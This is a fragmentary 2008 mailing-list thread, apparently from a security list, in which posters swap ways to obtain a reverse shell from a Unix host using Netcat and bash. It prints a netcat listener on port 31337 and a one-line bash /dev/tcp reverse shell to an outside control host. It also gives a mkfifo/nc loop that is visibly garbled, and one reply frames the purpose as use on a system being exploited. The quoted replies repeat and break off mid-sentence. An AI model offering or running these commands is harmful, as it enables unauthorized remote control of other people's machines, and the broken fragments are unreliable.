If you're using a non-crippled bash (anything non-debian/ubuntu) you
can connect a shell to a tcp socket directly like this;
On controlhost:
nc -l -p 31337
On slavehost:
bash -c "3<>/dev/tcp/controlhost.com/31337 ; bash >&3 <&3 2>&3" &
If you are using a crippled (debian) bash you have to jump
mkfifo /tmp/a; while true; do { sleep 1; nc 80 /tmp/a; } done
Il giorno 20/set/08, alle ore 01:25, 545945 ha scritto:
> Funny I actually saw your reply before my original post with the
> method in it was posted. The question was he wanted the easiest
> method using Netcat. On a system that you
Funny I actually saw your reply before my original post with the
method in it was posted. The question was he wanted the easiest
method using Netcat. On a system that you may not have a lot of
access to (i.e. one you are running an exploit against) downloading
cryptcat and running that would be a
On Fri, Sep 19, 2008 at 3:01 PM, 545945 <[EMAIL PROTECTED]> wrote:
> Recently a friend of mine asked me a seemingly simple question. What
> is the easiest method to get a reverse shell from a *nix based system using
> Netcat. He then added a caveat, that he did not want worry about
> recompi
Recently a friend of mine asked me a seemingly simple question. What
is the easiest method to get a reverse shell from a *nix based system using
Netcat. He then added a caveat, that he did not want worry about
recompiling the source to enable the "GAPING_SECURITY_HOLE" option that
allows you